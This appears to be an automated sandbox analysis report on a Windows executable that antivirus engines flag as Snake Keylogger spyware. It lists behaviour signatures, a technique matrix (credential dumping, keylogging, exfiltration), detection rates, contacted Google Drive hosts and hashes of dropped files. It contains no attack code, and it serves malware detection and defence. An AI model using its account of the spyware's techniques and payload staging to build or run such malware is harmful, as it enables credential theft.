      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping111
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts311
      Process Injection      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Xjz8dblHDe.exe61%VirustotalBrowse
      Xjz8dblHDe.exe71%ReversingLabsWin32.Spyware.Snakekeylogger
      Xjz8dblHDe.exe100%AviraTR/Redcap.ybyjk

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe100%AviraTR/Redcap.ybyjk
      C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe71%ReversingLabsWin32.Spyware.Snakekeylogger
      C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe61%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.184.206
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.185.193
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/xmsiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2687705790.000000000429D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711803858.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2699708927.000000000429F000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000003.2687763429.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000426C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3229050269.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510162857.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3101012200.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2522992057.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.00000000042D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2401935897.0000000004292000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2723378166.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711696944.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2814564639.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3147623816.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938842535.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545476786.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498862100.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950369422.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711766642.00000000042DA000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://translate.google.com/tmsiexec.exe, 00000005.00000003.3055299635.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3182243382.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927710979.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961566167.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3124455076.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044238660.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2882936221.00000000042DA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://translate.google.com/translate_a/elememsiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/pmsiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3055334878.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2641006198.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2973485192.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.usercontent.google.com/TCmsiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.usercontent.google.com/msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961631199.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3309084722.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950409947.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938906527.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2425982165.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927725562.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2915992411.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387541623.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2462756182.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorXjz8dblHDe.exe, Xjz8dblHDe.exe.1.drfalse
                                    		high
                                    https://drive.google.com/yxmsiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.com/hxmsiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2451545013.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2425982165.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2462756182.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.commsiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.micropowershell.exe, 00000001.00000002.2311002743.0000000007B2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/Xmsiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711803858.0000000004298000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2305178849.00000000052D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/Pmsiexec.exe, 00000005.00000002.3316965083.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://apis.google.commsiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.google.com/(msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/hmsiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2305178849.00000000052D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.185.193
                                                                  		drive.usercontent.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  142.250.184.206
                                                                  		drive.google.comUnited States
                                                                  		15169GOOGLEUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1587589
                                                                  Start date and time:2025-01-10 15:14:54 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 1s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:7
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Xjz8dblHDe.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:be0fbc1afbc35ae095067c50dbd7cbc61451663c3d9821377bb15febcdfbcf50.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@6/12@2/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 33.3%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 80
                                                                  • Number of non-executed functions: 54
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  09:15:47API Interceptor39x Sleep call for process: powershell.exe modified
                                                                  09:16:19API Interceptor40x Sleep call for process: msiexec.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  stage3.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206
                                                                  drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                  • 142.250.185.193
                                                                  • 142.250.184.206

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):14744
                                                                  Entropy (8bit):4.992175361088568
                                                                  Encrypted:false
                                                                  SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                  MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                  SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                  SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                  SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2capu3u.mez.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1500syi.p5k.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rs0d3vvu.sdx.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

